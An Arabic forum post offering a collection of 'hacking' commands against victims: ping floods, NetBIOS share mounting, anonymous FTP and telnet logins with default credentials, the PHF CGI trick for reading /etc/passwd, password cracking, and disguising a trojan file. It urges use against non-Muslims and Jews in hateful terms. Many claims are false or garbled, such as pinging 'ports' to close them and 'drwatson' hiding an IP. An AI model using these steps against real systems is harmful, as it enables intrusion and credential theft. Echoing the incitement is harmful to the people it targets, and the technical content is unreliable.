السلام عليكم
هذا الموضوع خطير جدا أرجو عدم الأستخدام ضد المسلمين
اخطر واغرب الأوامر بالجوس للهكر:
لتدمير المواقع:
ping -t www.كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة*.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة*.com
اهاه هذا الأمر الشاطر ويقوم باعطاء الاوامر للمستضيف
ping www.كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة*.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذا الاوامر للهجزم اكتب الموقع وهذا الامر ولا الاي بي يكون افضل
ping -w timeout www.كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة*.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذي المنافذ في جهازك
NETSTAT -A
هذا الامر لترا المنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معاك على الماسنجر وهو يحمل اكتبة بيجيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذا اوامر خطيرة
الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).
2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .
3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .
4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .
5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.
6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>
7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةS Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User name-Password
وهما يكونان محفوظين في ملف يسمي
PASSWD غالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host Name مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
pass zzzoozz@yahoo.com
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةs/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها
طريقة تغيير امتداد exe عن طريق الدوس جديد
اتبع الخطوات التالية:-
إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.
وهذي ارامر النت ستات مرة ثانية
مايتطسع فعله netstat
==============================================
NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة
هذا اوامر للدخول الى جهاز الضحية:
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP&g
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP&g
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء
إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةsrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp&gquote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp&gquote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp&gquote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق
230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status oka about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 \"PATHNAME\" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can\'t open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l\'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d\'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
اختراق الأجهزة :
ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف إضافة إزالة الملفات فيه ...
تتم أيضا بنفس الطريقة من متصفحك اكتب Telnet://IPNumberort حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
21 - 25 - 32(الأساسي) - 99 - 2001
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال
3 ــ اختراق المواقع :
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في http://packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
اسم المستخدم : كلمة المرور
anonymous : anonymous
guest : guest
root : root
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
young
test
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
أي الحسابات الغير محمية بكلمة سر .
اكتب الأمر :
GET /etc/passwd و GET /etc/group و GET /etc/shadow
ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
data = download
لكي تتمكن من التحكم بالملفات .
ماهو الملف psswd ?
الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
هذا الملف في ثلاث حالات :
1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
3 ــ متروك مثل ما هو ..
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
الباسووردات مشفرة ... سوف تراها كالمثال التالي :
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
هنا سوف نعرف المعلومات التالية:
1 ــ اسم المستخدم : sirhack .
2 ــ كلمة السر : 89fGc%^7 .
3 ــ الاسم الحقيقي : Sir Hackalot .
4 ــ مجلد الحساب : usr/sirhack/
5 ــ الغلاف(هنا الكلام في ينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة او لينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة) : bin/sh/
كما رأيتم فكلمة السر مشفرة .
===================================
ما هو الملف group ?
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .
===================================
ما هو الملف shadow ?
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...
كيف أفك التشفير ؟
استخدم أحد برنامجين :
1 ــ Cracker Jack .
2 ــ John the ripper .
وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة(وينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة) ...
نسخة اللينوكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة
http://www.openwall.com/john/john-1.6.tar.gz
نسخة الويندوز
http://www.openwall.com/john/john-16w.zip
++++++++++++++++++++++++++++++++++++++++++++++++++
التل نت اداة فقط بس هذي الاداة ضرورية في كل شي المهم راح اشرح اليوم طريقة الاختراق جربتها مره وصارت
وهي تعتبر من اسهل طرق الاختراق
خلينا نفسم الدرس الى اربع اقسام
بسم الله بدانا
و إضغط enter ثم القسم الاول:
اول شي ضروري نعرف بعض الاوامر الليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة السهلة
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
هذي مهمة جدا لنبدأ التعليم
واكو بعد WHO هذي اذا تعرف منو موجود على السيرفر وبعد اكو FINGER (اسم المستخدم) بين FINGER اسم المستخدم مسافة بدون الاقواس المهم ويا هذي الاوامر راح نقدر نتماشى ويا الدرس
القسم الثاني:
نظام اليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة او السيرفر مالته يحتفظ في كلمات السر في etc directory/ واسم الفايل passwd انته هسه تتوقع انك بس حصلت هذا الملف انتهى الموضوع وصرت هاكر لا
انته غلطان ميه بالميه لانو الباسيوردات مشفره ومستحيل تقدر تطلع الباسيورد منها
بس اكو حل اكو برنامج اسمه Cracker Jack هو مثل القاموس للتشفير يحتوي على الكثير من الباسيودات تقدرتنز http://www.geocities.com/SiliconValley/9185
وتقدر تحصل باسيوردات اكثر في sable.ox.ac.uk/pub/wordlists تنزله هو حوالي 4 ميجا بايت مظغوط يصير 8 ميجا بايت لاوم تحطه في ملف البرنامج
انا ان شاء الله راح اشرح برنامج Cracker Jack عن قريب بس اكو فايل موجود في البرنامج يعلمك المهم
القسم الثالث(الاصعب):
النظام يحفظ الباسيوردات احنا ما نقدر ندخل على السيستم لانو احن مو مصرح لنا المهم شلون نجيب ملف الباسيورد في طريقتين سهلات بس احيانا تشتغل
اولها تدخل للسيستم كانك anonymously لما تدخل مرات ftpمايكون مانع الدخول لملف الباسيوردات انته عليك تسوي etc directory/ تشوف اذا الباسيورد عليها حظراو لا اذا
ماكو عليها حظر بسهولة نزل ملف الباسيورد وشغل البرنامج Cracker Jack وطلع الباسيورد ومبروكة عليك بس اذا جان عليها حظر لازم تجرب الخطة الثانية في ملفات اسمها PHF هذي تحوي على كل شي باسيوردات وملفات والتحكم
فانته شلون تدخل عليها تفتح الاكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةيبلوير
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t%20/etc/passwd
ملاحظة بدال الاكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةات تكتب عنوان الموقع انا نجحت بالدخول على موقع عن طريق هذا بالمناسبة تقدر تخترق منتدى عن طريق هذي الحركة
اذا ما نجحوا الحركيتن معناها الباسيورد مضلل يعني موجود هذا النظام لحفظ الباسيوردات اللي انته ما تقدر تدخل عليها بس ماكو شي مستحيل
مرات في بعض الانظمة يكون السيستم بيه backup للباسوردات وتقدر تبحث عنه مثلا في etc/shadow/ بس يمكن تشتغل ويمكن ما تشتغل انته وحظك
ولهذا السبب انا معجب جدا في نظام apache لانه نظام رائع جدا ولايمكن اختراقه بسهولة
الجزء الرابع:
زين هسه حصلت الباسيوردمال اليوزر نيم اللي تريد تخترقه شلون تقدر تاخذها الك؟؟
شوف
تفتح التل نت وتدخل على السيرفر وتكتب اليوزر نيم والباسيورد بعدني تقدرتسوي اللي يحلو لك طبعا لكل سيرفر اوامر يوجد امثلة على السيرفر
UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms)
ملاحظة:يا اخوان انا لو اعرف نظام اليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة جيدا كان جعلت من نفسي هاكر قوي ولكني كنت تحت غشاوة البرامج بس هسه الحمد لله بديت اتعلم الليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة ثم سابدا بنظام اليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة
وان شاء الله ذلك سيساعدني على جعل من نفسي كل الهاكرز الحقيقن يعتمدون على اليونكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعة وليش على البرامج فيا اخوان شيلوا عنكم غشاوة
السب سفن وغيره وما عليك الا تتعلم من كتب او تاخذ كورس براحتك وانا مستعد اورك ابواب مال الهاكرز راح تتعجب انا ما اقور هذا الكلام ني خبير او اي شي ثاني
اقوله دعوة الكم والي حتى نبدأ بالطريق الصحيح للهاكرز
الطاعون
+++++++++++++++++++++++++++
إغلاق المنافذ port الموجودة بالجهاز
اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......
اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .
اتمنى اتباع الطريقه كما هي :
إدهب إلى:
Start&gRun ابداء &l تشغيل
واكتب الامر التالي
command.com
ستظهر لك نافذة إكتب فيها:
ping host
إنتظر و اكتب:
ping port
و إضغط enter
ثم إنتظر و اكتب:
ping port1027
وإضغط enter
و إنتظر ثم إكتب:
ping port80
و إضغط enter
ثم اكتب:
ping
و إضغط enter
ثم اكتب:
ping port
و إضغط enter
و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية.
FH,hlvD [ldu h,hlv hojvhr hgl,hru fhg],s